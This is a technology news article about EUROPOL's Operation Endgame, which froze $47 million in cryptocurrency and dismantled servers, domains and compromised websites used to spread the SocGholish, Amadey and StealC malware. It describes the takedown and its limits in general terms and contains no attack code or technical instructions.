- EUROPOL’s Operation Endgame Freezes $47M in Cryptocurrency and Dismantles Infrastructure for SocGholish, Amadey and StealC Malware
- 326 servers, 142 domains and 14,971 infected websites were taken down, disrupting distribution networks and recovering 27 million credentials
- No arrests were made; experts warn that such disruptions often only temporarily halt criminal operations until infrastructure is rebuilt
Millions of dollars in cryptocurrency were frozen and hundreds of servers taken down in a sweeping operation by EUROPOL and several national law enforcement agencies against cybercriminals.
Over the past few weeks, EUROPOL ran Operation Endgame together with law enforcement agencies from Canada, Denmark, Germany, the Netherlands, the United Kingdom and the United States. Several private companies, including Microsoft, also participated.
The goal was the dismantling of digital infrastructure used by three different hacking operations: SocGholish, Amadey and StealC. These are known malware variants that allow attackers backdoor access and steal valuable secrets from compromised devices.
Shutdown of servers and cleaning of websites
SocGholish, for example, is a sophisticated JavaScript downloader and loader linked to a Russian Malware-as-a-Service (MaaS) operation called Evil Corp.
During the operation, the police managed to identify and freeze 47 million dollars in cryptocurrencies. It cannot access or retrieve these funds, but by freezing them it effectively removed them from circulation. About 27 million login credentials were also recovered as part of this operation.
In addition, law enforcement shut down 326 servers and 142 domains used to host and distribute the malware. This, EUROPOL says, “severely hampered” the malware’s distribution network: “By simultaneously removing these tools, cooperation between law enforcement and private parties has increased friction for cybercriminals, making it harder for attacks to succeed, spread or recover.”
EUROPOL also said that by removing SocGholish, 14,971 infected websites were “fixed”. These are legitimate websites belonging to various businesses such as restaurants, auto repair shops and others, but were compromised and used as entry points for the delivery of malware.
Unfortunately, no arrests have been made and EUROPOL did not say whether key players in these groups were identified at all. Usually, disruptions like this only momentarily stop malicious activity, which resumes in a few weeks when the infrastructure is rebuilt.
The best antivirus for all budgets
Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews and opinions in your feeds.
